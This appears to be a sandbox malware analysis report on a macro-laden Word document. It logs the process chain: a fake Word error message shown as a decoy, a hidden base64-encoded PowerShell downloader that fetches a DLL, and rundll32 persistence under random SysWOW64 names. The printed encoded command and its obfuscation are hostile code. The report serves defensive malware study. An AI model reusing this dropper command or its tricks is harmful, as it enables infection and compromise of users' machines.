Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....Hc...............A.............}..v............0.l.............................H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....x.................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j.....Hc...............A.............}..v....H.......0.l.....................r.......H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j......................A.............}..v............0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;....... ..........j.....Hc...............A.............}..v............0.l.............8Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................A.............}..v....H.......0.l..............Ec.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................A.............}..v....x.......0.l...............c.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................A.............}..v............0.l...............c.............H............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: Informacion_4-09757.doc Metadefender: Detection: 36%
Source: Informacion_4-09757.doc ReversingLabs: Detection: 75%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
Source: Informacion_4-09757.doc Initial sample: OLE summary subject = withdrawal yellow Australia Credit Card Account Alabama connecting Jamaican Dollar Configuration Wooden Extension copy Marshall Islands ivory Rubber

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Informacion_4-09757.doc Stream path 'Macros/VBA/Qfepbztq9r8o1l76' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Qfepbztq9r8o1l76 Name: Qfepbztq9r8o1l76
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlAC